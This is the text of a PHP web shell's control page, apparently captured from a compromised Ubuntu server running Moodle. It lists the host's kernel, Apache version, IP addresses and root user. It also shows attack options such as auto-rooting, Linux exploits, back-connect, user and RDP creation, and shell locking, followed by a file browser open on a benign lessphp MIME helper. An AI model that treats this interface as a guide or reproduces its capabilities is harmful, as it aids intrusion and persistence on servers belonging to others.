Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle.backup.39 /
lib /
lessphp /
[ HOME SHELL ]
Name
Size
Permission
Action
Exception
[ DIR ]
drwxrwxr-x
Output
[ DIR ]
drwxrwxr-x
SourceMap
[ DIR ]
drwxrwxr-x
Tree
[ DIR ]
drwxrwxr-x
Visitor
[ DIR ]
drwxrwxr-x
Autoloader.php
1.42
KB
-rw-rw-r--
Cache.php
7.76
KB
-rw-rw-r--
Colors.php
4.17
KB
-rw-rw-r--
Configurable.php
1.26
KB
-rw-rw-r--
Environment.php
3.29
KB
-rw-rw-r--
Functions.php
36.9
KB
-rw-rw-r--
LICENSE
9.5
KB
-rw-rw-r--
Less.php.combine
226
B
-rw-rw-r--
Mime.php
1007
B
-rw-rw-r--
Output.php
749
B
-rw-rw-r--
Parser.php
59.76
KB
-rw-rw-r--
Tree.php
1.6
KB
-rw-rw-r--
Version.php
328
B
-rw-rw-r--
Visitor.php
850
B
-rw-rw-r--
VisitorReplacing.php
1.19
KB
-rw-rw-r--
moodle_readme.txt
333
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Mime.php
<?php /** * Mime lookup * * @package Less * @subpackage node */ class Less_Mime{ // this map is intentionally incomplete // if you want more, install 'mime' dep static $_types = array( '.htm' => 'text/html', '.html'=> 'text/html', '.gif' => 'image/gif', '.jpg' => 'image/jpeg', '.jpeg'=> 'image/jpeg', '.png' => 'image/png', '.ttf' => 'application/x-font-ttf', '.otf' => 'application/x-font-otf', '.eot' => 'application/vnd.ms-fontobject', '.woff' => 'application/x-font-woff', '.svg' => 'image/svg+xml', ); public static function lookup( $filepath ){ $parts = explode('.',$filepath); $ext = '.'.strtolower(array_pop($parts)); if( !isset(self::$_types[$ext]) ){ return null; } return self::$_types[$ext]; } public static function charsets_lookup( $type = null ){ // assumes all text types are UTF-8 return $type && preg_match('/^text\//',$type) ? 'UTF-8' : ''; } }
Close